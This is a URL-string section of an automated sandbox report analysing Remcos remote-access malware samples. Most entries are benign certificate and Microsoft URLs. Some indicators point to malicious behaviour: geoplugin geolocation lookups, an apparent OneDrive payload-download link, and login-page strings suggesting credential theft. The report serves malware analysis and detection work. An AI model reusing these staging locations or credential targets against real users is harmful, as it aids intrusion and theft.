                      Source: remcos.exe, 00000009.00000002.1583028383.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631551774.0000000002328000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: unknown | DNS traffic detected: queries for: onedrive.live.com
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
                      Source: fu56fbrtn8.exe, remcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000071A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://geoplugin.net/json.gp
                      Source: fu56fbrtn8.exe, 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: remcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpL
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpL9
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpLL
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphB
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpoft
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.digicert.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.digicert.com0:
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.digicert.com0Q
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocsp.msocsp.com0S
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://ocspx.digicert.com0E
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: http://www.digicert.com/CPS0~
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
                      Source: remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                      Source: remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comata
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                      Source: remcos.exe, 00000009.00000002.1578803145.0000000000193000.00000004.00000010.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1627422473.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.0000000000772000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.000000000097D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/
                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/S
                      Source: remcos.exe, 00000013.00000003.1914864143.0000000000810000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/l
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhv2770.tmp.9.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/B
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/L
                      Source: remcos.exe, 00000013.00000002.1928082246.00000000140F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey=
                      Source: remcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/gR
